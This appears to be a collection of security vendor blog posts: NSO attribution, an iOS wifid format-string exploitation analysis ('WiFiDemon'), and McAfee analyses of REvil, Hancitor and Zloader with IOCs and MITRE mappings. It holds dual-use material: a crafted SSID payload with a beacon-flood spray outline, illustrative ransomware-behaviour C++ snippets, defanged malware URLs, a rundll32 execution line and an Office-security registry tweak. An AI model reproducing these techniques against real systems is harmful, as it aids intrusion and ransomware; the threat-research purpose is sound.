ZecOps can now confirm, with high confidence, that the attacks targeting journalists in the Middle East were caused by at least two commercial threat actors working together, and that the attack was launched by a nation-state that purchased NSO's exploit platform.

This may sound like a minor detail, but every detail in attribution is crucial.


In its latest transparency report, NSO published that it limits the usage of its software.


This can be translated into: "We have a license-based attack-as-a-service model. We only sell a certain number of attack licenses to a certain buyer." While this intelligence is not fully confirmed and should be taken with a grain of salt, our intelligence also suggests that "Desert Cobra" (the state actor) purchased an 'unlimited number of licenses' package to carry out attacks using NSO's software.

NSO acquired exploits from another supplier and leveraged the borrowed exploit in the attack launched by the end-buyer (Desert Cobra) against Al-Jazeera journalists. It is unclear if the end-customer, a government, was aware that parts of the exploit chain were obtained from another threat actor and sold as a package.

Bottom line

As threat actors are working together, defenders should be working together too. We hope that the vendors reading this will give SOCs around the world better access in order to find and capture payloads by threat actors like NSO, who will always find a way - or, as we can see in this post, "buy their way" - to bypass all the existing mitigations and security controls.

ZecOps Mobile EDR Customers: no further action is required. ZecOps discovered the Al-Jazeera attack, and other NSO related incidents automatically. The deployed systems detect these activities. The complete report and full IOC list is available in ZecOps Mobile Threat Intelligence feed.

Al Jazeera NSO Attack IOCs:

  • /private/var/tmp/uevkjdwxijvah/c
  • /private/var/db/com.apple.xpc.roleaccountd.staging/launchafd
  • /private/var/db/com.apple.xpc.roleaccountd.staging/rs
  • /private/var/db/com.apple.xpc.roleaccountd.staging/natgd

Unfortunately, due to iOS sandbox restrictions, it is not trivial to check for these IOCs. If you would like to check your phone for these IOCs, other attacks by NSO, or other threat actors, please feel free to contact us here.

Free Mobile Inspection

To help discover these attacks, for a limited time, ZecOps is offering free mobile inspections to businesses that were targeted in the NSO leak. For your instant inspection, fill out the form below.


Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched

17 July 2021 at 13:30
Meet WiFiDemon – iOS WiFi RCE 0-Day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched

The TL;DR Version:

The ZecOps Mobile EDR Research team investigated whether the recently announced WiFi format-string bug in wifid was exploited in the wild.

This research led us to interesting discoveries:

  • A recently, silently patched 0-click WiFi proximity vulnerability affecting iOS 14 – iOS 14.4, without any assigned CVE
  • The publicly announced WiFi Denial of Service (DoS) bug, which is currently a 0day, is more than just a DoS - it is actually an RCE!
  • Analysis of whether either of the two bugs was exploited across our cloud user-base

Introduction

There's a new WiFi vulnerability in town. You probably already saw it but didn't realize the implications. The recently disclosed 'non-dangerous' WiFi bug is potent.

This vulnerability allows an attacker to infect a phone/tablet without *any* interaction from the victim. This type of attack is known as "0-click" (or "zero-click"). The vulnerability was only partially patched.

1. Prerequisites to the WiFiDemon 0-Click Attack:

  • Requires the WiFi to be open with Auto-Join (enabled by default)
  • Vulnerable iOS Version for 0-click: Since iOS 14.0
  • The 0-Click vulnerability was patched on iOS 14.4

Solutions:

  • Update to the latest version (14.6 at the time of writing) to avoid the risk of WiFiDemon in its 0-click form.
  • Consider disabling WiFi Auto-Join Feature via Settings->WiFi->Auto-Join Hotspot->Never.
  • Perform risk and compromise assessment to your mobile/tablet security using ZecOps Mobile EDR in case you suspect that you were targeted.

2. Prerequisites to the WiFi 0Day Format Strings Attack:

Contrary to initial research publications, at the time of writing, the WiFi format-strings bug appears to allow Remote Code Execution (RCE) when joining a malicious SSID.

Solutions:

  • Do not join unknown WiFis.
  • Consider disabling WiFi Auto-Join Feature via Settings->WiFi->Auto-Join Hotspot->Never.
  • Perform risk and compromise assessment to your mobile/tablet security using ZecOps Mobile EDR in case you suspect that you were targeted.
  • This vulnerability is still a 0day at the time of writing, July 4th. iOS 14.6 is VULNERABLE when connecting to a specially crafted SSID. 
  • Wait for an official update by Apple and apply it as soon as possible.

Wi-Fi-Demon ?

wifid is a system daemon that handles protocols associated with WiFi connections. wifid runs as root. Most of the handling functions are defined in the CoreWiFi framework, and these services are not accessible from within the sandbox. wifid is a sensitive daemon whose compromise may lead to whole-system compromise.

Recently, researcher Carl Schou (@vm_call) discovered that wifid has a format-string problem when handling SSIDs.

https://www.forbes.com/sites/kateoflahertyuk/2021/06/20/new-iphone-bug-breaks-your-wifi-heres-the-fix

The original tweet suggests that this wifid bug could permanently disable the iPhone's WiFi functionality, as well as the Hotspot feature. This "WiFi" Denial of Service (DoS) happens because wifid writes known WiFi SSIDs into the following three files on disk:

  • /var/preferences/com.apple.wifi.known-networks.plist
  • /var/preferences/SystemConfiguration/com.apple.wifi-networks.plist.backup
  • /var/preferences/SystemConfiguration/com.apple.wifi-private-mac-networks.plist

Every time that wifid respawns, it reads the bad SSID from a file and crashes again. Even a reboot cannot fix this issue.

However, this bug can be “fixed” by taking the following steps according to Forbes:

“The fix is simple: Simply reset your network settings by going to Settings > General > Reset > Reset Network Settings.”

This bug currently affects the latest iOS 14.6, and Apple has not yet released any fixes for this bug.

Further Analysis Claims: This is Only a Denial of Service

This was followed by another researcher, Zhi (@CodeColorist), who published a quick analysis.

https://blog.chichou.me/2021/06/20/quick-analysis-wifid/

His conclusion was:

“For the exploitability, it doesn’t echo and the rest of the parameters don’t seem like to be controllable. Thus I don’t think this case is exploitable.

After all, to trigger this bug, you need to connect to that WiFi, where the SSID is visible to the victim. A phishing Wi-Fi portal page might as well be more effective.”

The Plot Thickens

We checked ZecOps Mobile Threat Intelligence to see if this bug was exploited in the past. We noticed that two of our EMEA users had an event related to this bug. Of note, we only have access to our cloud data and couldn't check other on-premises clients - so we might be missing other events.

We asked ourselves: 

  1. Why would a person aware of dangerous threats connect to a network with such an odd name as “%s%s…”? – Unlikely.
  2. Why would an attacker bring a tactical team to target a VIP, only to cause a DoS? – It still does not make sense.

Remotely exploitable, 0-click, under the hood!

Further analysis revealed that:

  1. Attackers did not need to force the user to connect. This vulnerability could be launched as a 0-click, without any user interaction. A victim only needed to have their Wi-Fi turned on to trigger the vulnerable code.
  2. This is not a DoS, but an actual RCE vulnerability for both the recently patched 0-click format-strings vulnerability, and the malicious SSID format-strings 0-day vulnerability.

This 0-click bug was patched in iOS 14.4, with credit to “an anonymous researcher” for assisting. Although this is a potent 0-click bug, no CVE was assigned.

Technical Details: Analysis of a Zero-Click WiFi Vulnerability – WiFiDemon

Let’s do a deeper dive into the technical details behind this vulnerability:

Considering the possible impact of triggering this vulnerability as a 0-click, as well as the potential RCE implications, we investigated the wifid vulnerability in depth.

When we tested this format-strings bug on an older version, similar to our clients, we noticed that wifid has intriguing logs when it is not connected to any wifi.

These logs contain SSID, which indicates that it may be affected by the same format string bug. 

We tested it and, voilà, it is affected by the same format string bug – meaning that this is a zero-click vulnerability that can be triggered without the end-user ever connecting to a strangely named Wi-Fi network.

This log is related to a common smart device behavior: Automatically scan and join known networks.

Zero-Click – Even When The Screen is Off

The iPhone scans for Wi-Fi networks to join every ~3 seconds while the user is actively using the phone. Furthermore, even if the phone's screen has been turned off, it still scans for Wi-Fi, but at a lower frequency. The waiting time between scans grows longer and longer, from ~10 seconds to over a minute.

As long as the WiFi is turned on this vulnerability can be triggered. If the user is connected to an existing WiFi network, an attacker can launch another attack to disconnect/de-associate the device and then launch this 0-click attack. Disconnecting a device from a WiFi is well-documented and we’ll not cover it as part of the scope for this blog.

This 0-click vulnerability is powerful: if the malicious access point has password protection and the user never joins the Wi-Fi, nothing is saved to disk. After the malicious access point is turned off, the user's Wi-Fi works normally. A user could hardly notice if they have been attacked.

Exploiting this Vulnerability

We further analyzed whether this vulnerability can be exploited, and how:

This post assumes that the reader is aware of the concept of format-string bugs and how to exploit them. However, this bug is slightly different from “traditional” printf format string bugs because it goes through [NSString stringWithFormat:], which is implemented by Apple, and Apple removed support for %n for security reasons. %n is the specifier an attacker would normally use to write to memory when exploiting a traditional format string bug.
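The underlying class of bug is easiest to illustrate in plain C, leaving the Objective-C specifics aside. The following is a minimal, hypothetical sketch (the helper names are made up, and this is not Apple's code) of the difference between passing attacker-controlled data as the format string and passing it as a parameter – the latter being, in essence, the same pattern as the iOS 14.7 fix described at the end of this post:

#include <cstdio>

// hypothetical logging helpers, for illustration only
void log_ssid_vulnerable(const char* ssid) {
    // BUG: the SSID itself is used as the format string, so escape
    // sequences such as %x or %@ inside the SSID get interpreted
    printf(ssid);
}

void log_ssid_fixed(const char* ssid) {
    // the SSID is only ever treated as data
    printf("%s", ssid);
}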

Where You AT? – %@ Is Handy!

Since we cannot use %n, we looked for another way to exploit this 0-click N-Day, as well as the 1-click 0-day wifid bug. Another possible use is %@, which is uniquely used by Objective-C.

Since the SSID length is limited to 32 bytes, we can only put up to 16 Escape characters in a single SSID. Then the Escape characters we placed will process the corresponding data on the stack.

A potential exploit opportunity is if we can find an object that has been released on the stack, in that case, we can find a spray method to control the content of that memory and then use %@ to treat it as an Objective-C object, like a typical Use-After-Free that could lead to code execution.

Step 1: Find Possible Spraying Opportunities on the Stack

First, we need to design an automatic method to detect whether it is possible to tweak the data on the stack. An lldb breakpoint-handling script fits that purpose perfectly. Set a breakpoint right before the format string bug and attach an lldb script that automatically scans for and observes changes in the stack.

Step 2: Find an Efficient Spraying Method

Then we need a spray method that can interfere with wifid’s memory over the air. 

An interesting strategy is called Beacon Flooding Attack. It broadcasts countless Beacon frames and results in many access points appearing on the victim’s device.

To perform a beacon flooding attack, you need a wireless Dongle that costs around $10 and a Linux VM. Install the corresponding dongle firmware and a tool called mdk3. For details, please refer to this article.

As part of the beacon frame mandatory field, SSID can store a string of up to 32 bytes. wifid assigns a string object for each detected SSID. You can observe that from the log. This is the most obvious thing we can use for spray.

Now attach a debugger to wifid and start flooding the device with a list of SSIDs that can be easily recognized. Turn on the iOS wifi feature and wait until it begins automatically scanning for available WiFi. The breakpoint will get triggered and check through the stack to find traces of spray. Below is the output of the lldb script:

The thing that caught our eye is the pointer stored at stack + offset 0x18. Since the SSID can store up to 32 bytes, the shortest format string escape character such as %x will occupy two bytes, which means that we can reach the range of 16 pointers stored on the stack with a single SSID at most. So stack + offset 0x18 could be reached by the fourth escape character. And the test results tell us that data at this offset could be controlled by the content we spray.

Step 3 – Test the Ability to Remotely Control the Code Execution Flow

So in the next test, we kept the Beacon Flooding Attack running, meanwhile we built a hotspot named “DDDD%x%x%x%@”. Notice that %@ is the fourth escape character. Unsurprisingly, wifid crashes as soon as it reads the name, and it automatically respawns and crashes again as long as the hotspot is still on.

Checking the crash, it appears that the x15 register is easily affected.

Now analyze where it crashed. As the effect of %@ format specifier, it’s trying to print Objective-C Object.

The code block highlighted in yellow is the desired code execution flow. x0 is the pointer stored at stack + offset 0x18. We try to control its content through the spray and lead the situation to the typical Use-After-Free scenario. x9 is the data x0 points to. It represents isa pointer, which is the first member of the objc object data structure. As you can see in the figure, control x9 is critical to reaching that objc_msgSend call at the bottom. With more tests, we confirmed that stack + offset 0x18 indeed can be affected by the spray.

Now things have become more familiar. Pass a controlled/fake Objc object to objc_msgSend to achieve arbitrary code execution. The next challenge is finding a way to spray memory filled with ROP/JOP payload.

Step 4 – Achieving Remote Code Execution

wifid deals with a lot of wireless features. Spraying large memory wirelessly is left as an exercise for the reader. Locally, this bug can be used to build a partial sandbox escape to help achieve jailbreaking.

Attacks-In-The-Wild?

Ironically, the events that triggered our interest in this vulnerability were not related to an attack and the two devices were only subject to a denial of service issue that was fixed on iOS 14.6.

However, since this vulnerability was widely published, and relatively easy to notice, we are highly confident that various threat actors have discovered the same information we did, and we would like to encourage an issuance of a patch as soon as possible.

ZecOps Mobile EDR Customers will identify attacks leveraging these vulnerabilities with the tag “WiFiDemon”.

Generating an Alert Using ZecOps Mobile EDR

We have added generic rules for detection of successful exploitation to our customers.

We also provided instructions to customers on how to create a rule to see failed spraying / ASLR bypass attempts.

To summarize:

  • A related vulnerability was exploitable as a 0-click until iOS 14.4. CVE was not assigned and the vulnerability was silently patched. The patch thanks an anonymous researcher.
  • The publicly announced WiFi vulnerability is exploitable on 14.6 when connecting to a maliciously crafted SSID.
  • We highly recommend issuing a patch for this vulnerability.
  • Older devices, e.g. the iPhone 5s, are still on iOS 12.X, which is not vulnerable to the 0-click vulnerability.

If you’d like to check your phone and monitor it – feel free to reach out to us here to discuss how we can help you increase your mobile visibility using ZecOps Mobile EDR.

We would like to thank @08tc3wbb (follow), @ihackbanme (follow) and SYMaster for assisting with this blog.

iOS 14.7 fix

The fix in iOS 14.7 is straightforward: passing “%s” as the format string, with the SSID-containing string supplied as a parameter, solves the issue.

REvil Ransomware Uses DLL Sideloading

16 July 2021 at 16:49

This blog was written by Varadharajan Krishnasamy, Karthickkumar, Sakshi Jaiswal

Introduction

Ransomware attacks are one of the most common cyber-attacks against organizations, due to an increase in Ransomware-as-a-Service (RaaS) offerings on the black market. RaaS provides readily available ransomware to cyber criminals and is an effective way for attackers to deploy a variety of ransomware in a short period of time.

Usually, RaaS developers sell or rent their sophisticated ransomware frameworks on the black market. After purchasing a license from the ransomware developer, attackers spread the ransomware to other users, infect them, encrypt files, and demand a huge ransom payment in Bitcoin. Discounted frameworks are also available, in which the ransom money paid is shared between the developers and the buyer for every successful extortion. These frameworks reduce the time and effort of creating new ransomware from scratch using the latest and most advanced programming languages.

REvil is one of the most famous ransomware-as-a-service (RaaS) providers. The group released the Sodinokibi ransomware in 2019, and McAfee has since observed REvil using a DLL side loading technique to execute ransomware code. The actual ransomware is a dropper that contains two embedded PE files in the resource section.  After successful execution, it drops two additional files named MsMpEng.exe and MpSvc.dll in the temp folder. The file MsMpEng.exe is a Microsoft digitally signed file having a timestamp of March 2014 (Figure 1).

Figure-1: Image of Microsoft Digitally signed File

DLL SIDE LOADING

The malware uses DLL side loading to execute the ransomware code. This technique allows the attacker to execute malicious DLLs that spoof legitimate ones, and it has been used in many APT campaigns to avoid detection. In this attack, MsMpEng.exe loads the functions of MpSvc.dll at execution time. However, the attacker has replaced the clean MpSvc.dll with the ransomware binary of the same name. The malicious DLL file has an export function named ServiceCrtMain, which is then called and executed by the Microsoft Defender file. This is a clever technique used by the attacker to execute a malicious file using a Microsoft digitally signed binary.
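To make the side-loading mechanics concrete, here is a simplified, benign sketch of what such a DLL boils down to: a library dropped next to the signed executable that exposes the export name the executable resolves at runtime. The export name ServiceCrtMain comes from the analysis above; the body is an empty placeholder and is not REvil's code:

#include <windows.h>

// A stand-in for the malicious MpSvc.dll: all it needs is to export the
// name the signed MsMpEng.exe looks up. Whatever code is placed in that
// export then runs under the identity of the signed, trusted process.
extern "C" __declspec(dllexport) void ServiceCrtMain() {
    // placeholder: the real sample starts its ransomware logic here
}

BOOL WINAPI DllMain(HINSTANCE, DWORD, LPVOID) {
    return TRUE;
}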

Figure-2: Calling Export function

PAYLOAD ANALYSIS

The ransomware uses the RC4 algorithm to decrypt the config file which has all the information that supports the encryption process.

Figure-3: REvil Config File

Then it performs a UI language check using GetSystemDefaultUILanguage/GetUserDefaultUILanguage functions and compares it with a hardcoded list which contains the language ID of several countries as shown in below image.

Figure-4: Language Check

Countries excluded from this ransomware attack are mentioned below:

GetUserDefaultUILanguage Country name
0x419 Russian
0x422 Ukrainian
0x423 Belarusian
0x428 Tajik (Cyrillic from Tajikistan)
0x42B Armenian
0x42C Azerbaijani (Latin from Azerbaijan)
0x437 Georgian
0x43F Kazakh from Kazakhstan
0x440 Kyrgyzstan
0x442 Turkmenistan
0x443 Latin from Uzbekistan
0x444 Tatar from Russia Federation
0x818 Romanian from Moldova
0x819 Russian from Moldova
0x82C Cyrillic from Azerbaijan
0x843 Cyrillic from Uzbekistan
0x45A Syriac
0x281A Cyrillic from Serbia

 

Additionally, the ransomware checks the user's keyboard layout and skips infection on machines whose layout matches the country list above.

Figure-5: Keyboardlayout check
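A rough, illustrative sketch of what these two checks could look like in code is shown below. It only uses three of the language IDs from the table above and combines the UI-language and keyboard-layout checks; it is not the actual REvil code, which compares against the full list stored in its config:

#include <windows.h>

// illustrative only: the real sample checks the complete language ID list above
bool IsExcludedLocale() {
    const WORD excluded[] = { 0x419 /* Russian */, 0x422 /* Ukrainian */, 0x423 /* Belarusian */ };
    WORD uiLang = GetUserDefaultUILanguage();
    WORD kbdLang = LOWORD(GetKeyboardLayout(0));  // language ID of the active keyboard layout
    for (WORD id : excluded) {
        if (uiLang == id || kbdLang == id)
            return true;  // infection is skipped on such machines
    }
    return false;
}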

Ransomware creates a Global mutex in the infected machine to mark its presence.

Figure-6: Global Mutex

After creating the mutex, the ransomware deletes the files in the recycle bin using the SHEmptyRecycleBinW function to make sure that no files are restored post encryption.

Figure-7: Empty Recycle Bin
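A compact sketch of these two steps is shown below; the mutex name here is invented, since the real one is campaign specific:

#include <windows.h>
#include <shellapi.h>

// illustrative only
void MarkPresenceAndEmptyRecycleBin() {
    // create a global mutex to mark the infection's presence
    CreateMutexW(nullptr, FALSE, L"Global\\ExampleRansomwareMarker");
    if (GetLastError() == ERROR_ALREADY_EXISTS)
        return;  // another instance is already running
    // wipe the recycle bin so previously deleted files cannot be restored
    SHEmptyRecycleBinW(nullptr, nullptr,
        SHERB_NOCONFIRMATION | SHERB_NOPROGRESSUI | SHERB_NOSOUND);
}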

Then it enumerates all the active services with the help of the EnumServicesStatusExW function and deletes services if the service name matches the list present in the config file. The image below shows the list of services checked by the ransomware.

Figure-8: Service List check

It calls the CreateToolhelp32Snapshot, Process32FirstW and Process32NextW functions to enumerate running processes and terminates those matching the list present in the config file. The following processes will be terminated (a condensed sketch of this loop follows the list):

  • allegro
  • steam
  • xtop
  • ocssd
  • xfssvccon
  • onenote
  • isqlplussvc
  • msaccess
  • powerpnt
  • cad
  • sqbcoreservic
  • thunderbird
  • oracle
  • infopath
  • dbeng50
  • pro_comm_msg
  • agntsvc
  • thebat
  • firefox
  • ocautoupds
  • winword
  • synctime
  • tbirdconfig
  • mspub
  • visio
  • sql
  • ocomm
  • orcad
  • mydesktopserv
  • dbsnmp
  • outlook
  • cadence
  • excel
  • wordpad
  • creoagent
  • encsvc
  • mydesktopqos
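The condensed sketch below illustrates the enumerate-and-terminate loop referenced above, matching against a single example name from the list; the real sample iterates over the names embedded in its decrypted config:

#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>

// illustrative only: one hardcoded name instead of the config-driven list
void TerminateBlockedProcesses() {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE)
        return;
    PROCESSENTRY32W pe{ sizeof(pe) };
    for (BOOL ok = Process32FirstW(hSnap, &pe); ok; ok = Process32NextW(hSnap, &pe)) {
        if (_wcsicmp(pe.szExeFile, L"outlook.exe") == 0) {  // example entry from the list above
            HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID);
            if (hProc) {
                TerminateProcess(hProc, 1);
                CloseHandle(hProc);
            }
        }
    }
    CloseHandle(hSnap);
}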

 

Then, it encrypts files using the Salsa20 algorithm, using multithreading for fast encryption. Afterwards, the desktop wallpaper is set to display a ransom message.

Figure-9: Desktop Wallpaper

Finally, the ransomware displays ransom notes on the victim's machine. Below is an image of the readme.txt which is dropped on the infected machine.

Figure-10: Ransom Note

IOCs and Coverage

Type Value Detection Name Detection Package Version (V3)
Loader 5a97a50e45e64db41049fd88a75f2dd2 REvil.f 4493
Dropped DLL 78066a1c4e075941272a86d4a8e49471 REvil.e 4493

 

Expert rules allow McAfee customers to extend their coverage. This rule covers this REvil ransomware behaviour.

MITRE

Technique ID Tactic Technique Details
T1059.003 Execution Command and Scripting Interpreter
T1574.002 Defense Evasion Hijack Execution Flow: DLL Side-Loading
T1486 Impact Data Encrypted for Impact
T1036.005 Defense Evasion Masquerading
T1057 Discovery Process Discovery
T1082 Discovery System Information Discovery

Conclusion

McAfee observed that the REvil group utilized the Oracle WebLogic vulnerability (CVE-2019-2725) to spread the ransomware last year and recently used Kaseya's VSA application for ransomware execution, with the help of DLL sideloading. REvil exploits many vulnerable applications for its ransomware infections, however the encryption technique remains the same. McAfee recommends making periodic backups of files, keeping them isolated off the network, and having an always-updated antivirus in place.

The post REvil Ransomware Uses DLL Sideloading appeared first on McAfee Blog.

Hancitor Making Use of Cookies to Prevent URL Scraping

8 July 2021 at 22:15

This blog was written by Vallabh Chole & Oliver Devane

Over the years, the cybersecurity industry has seen many threats get taken down, such as the Emotet takedown in January 2021. It doesn’t usually take long for another threat to attempt to fill the gap left by the takedown. Hancitor is one such threat.

Like Emotet, Hancitor can send Malspams to spread itself and infect as many users as possible. Hancitor’s main purpose is to distribute other malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware and Zeppelin Ransomware. The dropped Cobalt Strike beacons can then be used to move laterally around the infected environment and also execute other malware such as ransomware.

This blog will focus on a new technique used by Hancitor created to prevent crawlers from accessing malicious documents used to download and execute the Hancitor payload.

The infection flow of Hancitor is shown below:

A victim will receive an email with a fake DocuSign template to entice them to click a link. This link leads the victim to feedproxy.google.com, a service that works similarly to an RSS feed and enables site owners to publish site updates to their users.

When accessing the link, the victim is redirected to the malicious site. The site will check the User-Agent of the browser and if it is a non-Windows User-Agent the victim will be redirected to google.com.

If the victim is on a windows machine, the malicious site will create a cookie using JavaScript and then reload the site.

The code to create the cookie is shown below:

The above code writes the timezone name to the value ‘n’ and the offset from UTC to the value ‘d’, and sets them in the cookie header of an HTTP GET request.

For example, if this code is executed on a machine with timezone set as BST the values would be:

d = 60

n = “Europe/London”

These values may be used to prevent further malicious activity or deploy a different payload depending on geo location.

Upon reloading, the site will check if the cookie is present and if it is, it will present them with the malicious document.

A WireShark capture of the malicious document which includes the cookie values is shown below:

The document will prompt them to enable macros and, when enabled, it will download the Hancitor DLL and then load it with Rundll32.

Hancitor will then communicate with its C&C and deploy further payloads. If running on a Windows domain, it will download and deploy a Cobalt Strike beacon.

Hancitor will also deploy SendSafe which is a spam module, and this will be used to send out malicious spam emails to infect more victims.

Conclusion

With its ability to send malicious spam emails and deploy Cobalt Strike beacons, we believe that Hancitor will be a threat closely linked to future ransomware attacks much like Emotet was. This threat also highlights the importance of constantly monitoring the threat landscape so that we can react quickly to evolving threats and protect our customers from them.

IOCs, Coverage, and MITRE

IOCs

IOC Type IOC Coverage Content Version
Malicious Document SHA256 e389a71dc450ab4077f5a23a8f798b89e4be65373d2958b0b0b517de43d06e3b W97M/Dropper.hx 4641
Hancitor DLL SHA256 c703924acdb199914cb585f5ecc6b18426b1a730f67d0f2606afbd38f8132ad6 Trojan-Hancitor.a 4644
Domain hosting Malicious Document URL http[:]//onyx-food[.]com/coccus.php RED N/A
Domain hosting Malicious Document URL http[:]//feedproxy[.]google[.]com/~r/ugyxcjt/~3/4gu1Lcmj09U/coccus.php RED N/A

Mitre

Technique ID Tactic Technique details
T1566.002 Initial Access Spam mail with links
T1204.001 Execution User Execution by opening link.
T1204.002 Execution Executing downloaded doc
T1218 Defence Evasion Signed Binary Execution Rundll32
T1055 Defence Evasion Downloaded binaries are injected into svchost for execution
T1482 Discovery Domain Trust Discovery
T1071 C&C HTTP protocol for communication
T1132 C&C Data is base64 encoded and xored

 

 

The post Hancitor Making Use of Cookies to Prevent URL Scraping appeared first on McAfee Blog.

Zloader With a New Infection Technique

8 July 2021 at 21:44

This blog was written by Kiran Raj & Kishan N.

Introduction

In the last few years, Microsoft Office macro malware using social engineering as a means for malware infection has been a dominant part of the threat landscape. Malware authors continue to evolve their techniques to evade detection. These techniques involve utilizing macro obfuscation, DDE, living off the land tools (LOLBAS), and even utilizing legacy supported XLS formats.

McAfee Labs has discovered a new technique that downloads and executes malicious DLLs (Zloader) without any malicious code present in the initial spammed attachment macro. The objective of this blog is to cover the technical aspect of the newly observed technique.

Infection map

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.
  • The Word document Visual Basic for Applications (VBA) reads the cell contents of the downloaded XLS file and writes into the XLS VBA as macros.
  • Once the macros are written to the downloaded XLS file, the Word document sets the policy in the registry to disable the Excel macro warning and calls the malicious macro function dynamically from the Excel file.
  • This results in the downloading of the Zloader payload. The Zloader payload is then executed by rundll32.exe.

The section below contains the detailed technical analysis of this technique.

Detailed Technical Analysis

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, the Word document, in turn, downloads and opens another password-protected Microsoft Excel document.

After downloading the XLS file, the Word VBA reads the cell contents from XLS and creates a new macro for the same XLS file and writes the cell contents to XLS VBA macros as functions.

Once the macros are written and ready, the Word document sets the policy in the registry to Disable Excel Macro Warning and invokes the malicious macro function from the Excel file. The Excel file now downloads the Zloader payload. The Zloader payload is then executed using rundll32.exe.

Figure-1: flowchart of the Infection chain

Word Analysis

Here is how the face of the document looks when we open it (figure 2). Normally, macros are disabled from running by default in Microsoft Office. The malware authors are aware of this and hence present a lure image to trick victims into enabling the macros.

Figure-2: Image of Word Document Face

The userform combo-box components present in the Word document store all the content required to connect to the remote Excel document, including the Excel object, the URL, and the password required to open the Excel document. The URL is stored in the combo-box in the form of broken strings which are later concatenated to form a complete cleartext string.

Figure-3: URL components (right side) and the password to open downloaded Excel document (“i5x0wbqe81s”) present in user-form components.

VBA Macro Analysis of Word Document

Figure-4: Image of the VBA editor

In the above image of the macros (figure 4), the code is attempting to download and open the Excel file hosted on the malicious domain. First, it creates an Excel application object by using the CreateObject() function and reading the string from Combobox-1 (ref figure-2) of Userform-1, which has the string “excel. Application” stored in it. After creating the object, it uses the same object to open the Excel file directly from the malicious URL, along with the password, without saving the file to disk, by using the Workbooks.Open() function.

Figure-5: Word Macro code that reads strings present in random cells in Excel sheet.

 

The above snippet (figure 5) shows part of the macro code that is reading the strings from the Excel cells.

For Example:

Ixbq = ifk.sheets(3).Cells(44,42).Value

The code is storing the string present in sheet number 3 and the cell location (44,42) into the variable “ixbq”. The Excel.Application object that is assigned to variable “ifk” is used to access sheets and cells from the Excel file that is opened from the malicious domain.

In the below snippet (figure 6), we can observe the strings stored in the variables after being read from the cells. We can observe that it has string related to the registry entry “HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM” that is used to disable trust access for VBA into Excel and the string “Auto_Open3” that is going to be the entry point of the Excel macro execution.

We can also see the strings “ThisWorkbook”, “REG_DWORD”, “Version”, “ActiveVBProject”, as well as a few random functions like “Function c4r40() c4r40=1 End Function”. This macro code cannot be caught by static detection since the content is formed dynamically at run time.

Figure-6: Value of variables after reading Excel cells.

After extracting the contents from the Excel cells, the parent Word file creates a new VBA module in the downloaded Excel file by writing the retrieved contents. Basically, the parent Word document is retrieving the cell contents and writing them to XLS macros.

Once the macro is formed and ready, it modifies the below RegKey to disable trust access for VBA on the victim machine to execute the function seamlessly without any Microsoft Office Warnings.

HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM

After writing the macro contents to the Excel file and disabling trust access, the function ‘Auto_Open3()’ from the newly written Excel VBA is called, which downloads the Zloader DLL from ‘hxxp://heavenlygem.com/22.php?5PH8Z’ with the extension .cpl.

Figure-7: Image of ’Auto_Open3()’ function

The downloaded dll is saved in %temp% folder and executed by invoking rundll32.exe.

Figure-8: Image of zloader dll invoked by rundll32.exe

Command-line parameter:

Rundll32.exe shell32.dll,Control_RunDLL “<path downloaded dll>”

The Windows Rundll32 command loads and runs 32-bit DLLs and can be used to directly invoke specified functions or to create shortcuts. In the above command line, the malware uses the “Rundll32.exe shell32.dll,Control_RunDLL” function to invoke control.exe (the Control Panel) and passes the DLL path as a parameter; therefore the downloaded DLL is executed by control.exe.

Excel Document Analysis:

The below image (figure 9) is the face of the password-protected Excel file that is hosted on the server. We can observe random cells storing chunks of strings like “RegDelete”, “ThisWorkbook”, “DeleteLines”, etc.

These strings present in worksheet cells are formed as VBA macro in the later stage.

Figure-9: Image of Remote Excel file.

Coverage and prevention guidance:

McAfee’s Endpoint products detect this variant of malware and files dropped during the infection process.

The main malicious document with SHA256 (210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf) is detected with V3 package version 4328.0 as “W97M/Downloader.djx”. The final Zloader payload with SHA256 (c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2), which is a DLL, is detected by the signature Zloader-FCVP with V3 package version 4327.0.

Additionally, with the help of McAfee’s Expert rule feature, customers can strengthen the security by adding custom Expert rules based on the behavior patterns of the malware. The below EP rule is specific to this infection pattern.

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the macro execution for Office files. We advise everyone to read our blog on this new variant of Zloader and its infection cycle to understand more about the threat.

Different techniques & tactics are used by the malware to propagate and we mapped these with the MITRE ATT&CK platform.

  • E-mail Spear Phishing (T1566.001): Phishing acts as the main entry point into the victim’s system where the document comes as an attachment and the user enables the document to execute the malicious macro and cause infection. This mechanism is seen in most of the malware like Emotet, Drixed, Trickbot, Agenttesla, etc.
  • Execution (T1059.005): This is a very common behavior observed when a malicious document is opened. The document contains embedded malicious VBA macros which execute code when the document is opened/closed.
  • Defense Evasion (T1218.011): Execution of signed binary to abuse Rundll32.exe and to proxy execute the malicious code is observed in this Zloader variant. This tactic is now also part of many others like Emotet, Hancitor, Icedid, etc.
  • Defense Evasion (T1562.001): In this tactic, it Disables or Modifies security features in Microsoft Office document by changing the registry keys.

IOC

Type Value Scanner Detection Name Detection Package Version (V3)
Main Word Document 210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf ENS W97M/Downloader.djx 4328
Downloaded dll c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2 ENS Zloader-FCVP 4327
URL to download XLS hxxp://heavenlygem.com/11.php WebAdvisor Blocked N/A
URL to download dll hxxp://heavenlygem.com/22.php?5PH8Z WebAdvisor Blocked N/A

Conclusion

